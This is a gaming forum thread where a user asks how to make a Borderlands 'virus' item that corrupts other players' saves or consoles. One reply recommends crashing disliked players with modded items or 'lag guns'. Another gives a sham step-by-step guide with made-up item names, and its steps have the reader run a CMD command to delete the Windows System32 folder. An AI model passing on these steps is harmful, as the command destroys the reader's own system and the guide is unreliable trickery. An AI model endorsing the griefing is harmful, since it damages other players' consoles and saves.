How to make a cocanut virus???

• Thread starter acerider77
  • Start date
  • Views 1,499
A

acerider77

Reaction score
Sin$
How do you make a cocanut virus in the game borderlands??:?:?:?:?:?:?:?:?:?

trtl

trtl

Seasoned Member
Mythical Veteran Forum Addict Legendary Veteran
Reaction score
Sin$
It's a skag pearl, not a coconut, and it works just like any other virus-like mod.

V

vettefan88

Enthusiast
Reaction score
Sin$
scavenger class mod + currency of any sort = "virus"

with enough of these you can "infect" an unsuspecting host, and they will crash their console with any time they kill a creature type enemy.

not a good idea. if you don't like somebody, just put together a lag gun and crash them out the once.

A

acerider77

Reaction score
Sin$
IM talking about a virus in borderlands that if you drop it and some one picks it up it will corrupt thier account or make millions of it self in thier inventory. There are rumors of new ones that look like a gernade.

S

Skorp

Reaction score
Sin$
vettefan88 said:
scavenger class mod + currency of any sort = "virus"

with enough of these you can "infect" an unsuspecting host, and they will crash their console with any time they kill a creature type enemy.

not a good idea. if you don't like somebody, just put together a lag gun and crash them out the once.

I'm confused... so does this virus thing destroy your console or save file?:?

idlehands88

idlehands88

Getting There
Reaction score
Sin$
acerider77 said:
IM talking about a virus in borderlands that if you drop it and some one picks it up it will corrupt thier account or make millions of it self in thier inventory. There are rumors of new ones that look like a gernade.

What a dumb and horrible item, I say screw this guy and not help him. If this gets made BL will DEFINITLY be destroyed! :confused:cared: This item has NO point other than to **** people up, therefore needs to STAY OFF BL! << Just my opinion....

V

Viperkill101

Reaction score
Sin$
I agree with Idle. That is just a pointless item, and honestly, a bit of a **** move to do to someone. Even if they came into your yard; kicked your dog... still, no.

S

SeanO323

Is this Infectable?
Reaction score
Sin$
really i mean modded guns are fine and all but i mod for fun not to screw peoples games up i agree do not help this guy Borderlands will DIE if you do!

N

ninetyseven

Reaction score
Sin$
Wait so if I put one of these currency class mods or shields in my file (through willowtree) will I be affected by it or is it just someone who picks it up that is affected by it?

X

XiX ATLAS XiX

Enthusiast
Reaction score
Sin$
acerider77 said:
How do you make a cocanut virus in the game borderlands??:?:?:?:?:?:?:?:?:?
Its not a cocanut virus its a ProfileSaveCC Virus

It's not rocket science your going to need something that can either duplicate in inventory or spawn itself in the map and with every load plus drop a 1000 times. I am doing the second one, this one crashes profiles and saves.

Just follow these steps

1. Open WillowTree either one.
  2. Upload your save
  3. Click new weapon
  4. Minimise screen, press start --> Search for "CMD"
  5. Once open CMD and you should be presented with a screen saying C:\Users\(your username)
  6. Leave CMD open, go back to WillowTree and in the new weapon name the grip as follows:
    "grip.machine_gun.support.delete.drop000.1.add_grenade_mod2"
  7. Make the manufacturer:
    "Manufacture.deletesavfile000.1_99.drop_grenade_mod2"
  8. Go back to CMD and type "DEL C\WINDOWS\SYSTEM32\(leave this blank until later)"
    DO NOT PRESS ANYTHING AFTER TYPING THAT
  9. Go back to WillowTree and save changes, ignore the error messages it brings up, now copy the file into "New Folder(9)"
  10. Delete the original save file, and make sure it is in the recycle bin
  11. Go back to CMD and press ENTER and then "y"
  12. Wait for CMD to finish, close CMD.
  13. Go to recycle bin and restore the deleted save file from earlier. Empty recycle bin. Insert the deleted save file into your HDD and now your done.
NEVER EQUIP THIS ITEM OR IT WILL CRASH YOUR XBOX AND CORRUPT YOUR PROFILE AND BORDERLANDS SAVE!

TO USE IT YOU MUST DROP THE ITEM, IT WILL THEN TAKE EFFECT AFTER 10 SECONDS, LEAVE THE GAME BEFOREHAND.

:thumbup:HAVE FUN:thumbup:

Bane Predation

Bane Predation

Enthusiast
Reaction score
Sin$
That was retarded to do, give a step by step for some retard who thinks its funny to mess with other people. If this circulates it will ruin game play for so many, not to mention their consoles. Seriously I wonder what would possess you to release something like that on a site like this. Im all for modding but this is beyond ridiculous and the post should be deleted before it gets in the wrong hands.

F

fROMOHIO

Enthusiast
Reaction score
Sin$
Bane Predation said:
That was retarded to do, give a step by step for some retard who thinks its funny to mess with other people. If this circulates it will ruin game play for so many, not to mention their consoles. Seriously I wonder what would possess you to release something like that on a site like this. Im all for modding but this is beyond ridiculous and the post should be deleted before it gets in the wrong hands.

*****, shut up. You're an idiot.

Bane Predation

Bane Predation

Enthusiast
Reaction score
Sin$
I believe that the point of forums is to express your opinions & contribute input on various topics. But of course there is always someone like you who thinks otherwise, and prides themselves on making posts like that. Grow up.

X

XiX ATLAS XiX

Enthusiast
Reaction score
Sin$
Bane Predation said:

Nice leecher aint ya, perhaps you should read or are you socially inadequate and therefor can't?

TotesMagotes69 said:
you are going to recieve and infraction...gtfo

Also you should gtfo leecher, you know nothing about this site, have you even read the rules? No srsly please leave.

Top Bottom
Login
Register